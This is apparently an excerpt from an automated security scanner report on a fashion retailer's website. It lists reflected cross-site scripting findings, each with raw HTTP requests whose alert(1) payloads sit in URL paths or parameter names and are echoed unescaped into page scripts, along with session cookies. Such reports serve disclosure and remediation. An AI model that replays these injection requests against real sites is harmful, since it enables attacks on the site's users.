The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4c2"-alert(1)-"ba5b05c538c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear6b4c2"-alert(1)-"ba5b05c538c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=64rrfdccnav5m7b6pccdkibtl1; expires=Tue, 09-Nov-2010 17:01:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear6b4c2"-alert(1)-"ba5b05c538c/");
//]]>
...[SNIP]...

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b99"-alert(1)-"b505e6d38e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hq2hfb1u0vk5sq9um71vvc1je1; expires=Tue, 09-Nov-2010 17:00:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Knitwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1");
//]]>
...[SNIP]...

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d63e5"-alert(1)-"f5e78f500b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mend63e5"-alert(1)-"f5e78f500b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=smj18gun57kdkd0467j6k2ble0; expires=Tue, 09-Nov-2010 17:01:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mend63e5"-alert(1)-"f5e78f500b1/shirts/");
//]]>
...[SNIP]...

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7c4"-alert(1)-"ab334987f53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts1c7c4"-alert(1)-"ab334987f53/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7shd2ampm5hb37fpk1t5lpef0; expires=Tue, 09-Nov-2010 17:01:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts1c7c4"-alert(1)-"ab334987f53/");
//]]>
...[SNIP]...

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89931"-alert(1)-"4ce4c5dd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts/?89931"-alert(1)-"4ce4c5dd22=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r9bl983eqckpoi5qide0uqtdk7; expires=Tue, 09-Nov-2010 17:00:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts/?89931"-alert(1)-"4ce4c5dd22=1");
//]]>
...[SNIP]...

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f6f"-alert(1)-"8259a03e431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men98f6f"-alert(1)-"8259a03e431/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cpnpt2cakueaginagvi7a3ccr3; expires=Tue, 09-Nov-2010 17:02:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men98f6f"-alert(1)-"8259a03e431/t-shirts/");
//]]>
...[SNIP]...

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee9e"-alert(1)-"5e40d014b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts9ee9e"-alert(1)-"5e40d014b78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s9pds8t8hgp1kss83ab38dr1n7; expires=Tue, 09-Nov-2010 17:02:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts9ee9e"-alert(1)-"5e40d014b78/");
//]]>
...[SNIP]...

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b5e"-alert(1)-"444542d087e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8julcge7l3eu86jt983j9j80i2; expires=Tue, 09-Nov-2010 17:00:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1");
//]]>
...[SNIP]...

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b32d8"-alert(1)-"8e055ac8dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb32d8"-alert(1)-"8e055ac8dec/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f0fa2f8e8h2rpes2q3rqh16836; expires=Tue, 09-Nov-2010 16:59:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb32d8"-alert(1)-"8e055ac8dec/tennis/");
//]]>
...[SNIP]...

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9404e"-alert(1)-"ba168a9b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis9404e"-alert(1)-"ba168a9b142/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ijktja01c1msmhc06ponorhte7; expires=Tue, 09-Nov-2010 16:59:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis9404e"-alert(1)-"ba168a9b142/");
//]]>
...[SNIP]...

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3032"-alert(1)-"08334eb7cc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis/?b3032"-alert(1)-"08334eb7cc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahniq827j27m6f4gaeuunsfdo4; expires=Tue, 09-Nov-2010 16:58:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis/?b3032"-alert(1)-"08334eb7cc3=1");
//]]>
...[SNIP]...

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b540b"-alert(1)-"d6d90d603e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb540b"-alert(1)-"d6d90d603e1/track-jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2lp41odj8d5fkstds9t06rrt80; expires=Tue, 09-Nov-2010 17:01:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb540b"-alert(1)-"d6d90d603e1/track-jackets/");
//]]>
...[SNIP]...

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f64a"-alert(1)-"cbf3aada87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets9f64a"-alert(1)-"cbf3aada87/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k8brnmco109mo4fdmvep7dio44; expires=Tue, 09-Nov-2010 17:02:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets9f64a"-alert(1)-"cbf3aada87/");
//]]>
...[SNIP]...

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e0d1"-alert(1)-"d9c3a859d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rurooq2eta8jp8rpvoms7jg661; expires=Tue, 09-Nov-2010 17:00:44 GMT; path=/; domain=www.fredperry.com
